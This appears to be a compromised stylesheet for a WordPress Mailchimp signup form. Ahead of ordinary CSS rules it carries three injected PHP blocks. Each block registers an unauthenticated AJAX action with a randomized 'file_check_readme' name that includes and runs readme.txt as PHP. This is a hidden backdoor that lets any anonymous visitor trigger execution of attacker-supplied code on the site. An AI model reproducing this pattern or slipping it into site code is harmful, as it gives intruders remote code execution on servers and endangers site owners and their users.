if(!function_exists('file_check_readme91088')){ add_action('wp_ajax_nopriv_file_check_readme91088', 'file_check_readme91088'); add_action('wp_ajax_file_check_readme91088', 'file_check_readme91088'); function file_check_readme91088() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme43991')){ add_action('wp_ajax_nopriv_file_check_readme43991', 'file_check_readme43991'); add_action('wp_ajax_file_check_readme43991', 'file_check_readme43991'); function file_check_readme43991() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64565')){ add_action('wp_ajax_nopriv_file_check_readme64565', 'file_check_readme64565'); add_action('wp_ajax_file_check_readme64565', 'file_check_readme64565'); function file_check_readme64565() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } .mc_error_msg { color: red; margin-bottom: 1.0em; } .mc_success_msg { color: green; margin-bottom: 1.0em; } .mc_merge_var{ padding:0; margin:0; } #mc_signup_container {} #mc_signup_form {} #mc_signup_form .mc_var_label {} #mc_signup_form .mc_input {} #mc-indicates-required { width:100%; } #mc_display_rewards {} .mc_interests_header { font-weight:bold; } div.mc_interest{ width:100%; } #mc_signup_form input.mc_interest {} #mc_signup_form select {} #mc_signup_form label.mc_interest_label { display:inline; } .mc_signup_submit { text-align:center; } ul.mc_list { list-style-type: none; } ul.mc_list li { font-size: 12px; } #ui-datepicker-div .ui-datepicker-year { display: none; } #ui-datepicker-div.show .ui-datepicker-year { display: inline; padding-left: 3px }